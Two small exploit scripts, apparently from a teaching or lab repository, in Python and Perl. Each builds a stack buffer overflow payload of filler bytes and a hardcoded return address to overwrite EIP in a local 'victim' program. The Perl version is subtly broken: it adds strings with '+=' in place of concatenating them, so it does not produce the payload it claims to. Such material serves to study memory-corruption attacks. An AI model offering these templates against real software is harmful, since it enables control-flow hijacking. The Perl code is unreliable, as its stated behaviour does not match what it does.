File: security/shellcode/overwrite_eip/attack.py
#!/usr/bin/python

# This program is the python version of attack.
# It's also GPL'ed:-\

import os

code = ""
code += "\x41" * 10	#buf, fill with 'A'
code += "\x42" * 4	#variable "x", fill with 'B'
code += "\x43" * 4	# ebp, fill with 'C' 
code += "\x82\x84\x04\x08" #eip, change the correct address for your machine 

cmd = "./victim " + code
os.system(cmd)

File: security/shellcode/overwrite_eip/attack.pl
#!/usr/bin/env perl

# This program is the Perl version of attack.
# It's also GPL'ed:-\


$code = "";
$code += "\x41" x 10;   #buf, fill with 'A'
$code += "\x42" x 4;	#variable "x", fill with 'B'
$code += "\x43" x 4;	# ebp, fill with 'C' 
$code += "\x82\x84\x04\x08"; #eip, change the correct address for your machine 

$ret = `./victim $code`;

print $ret . "\n";
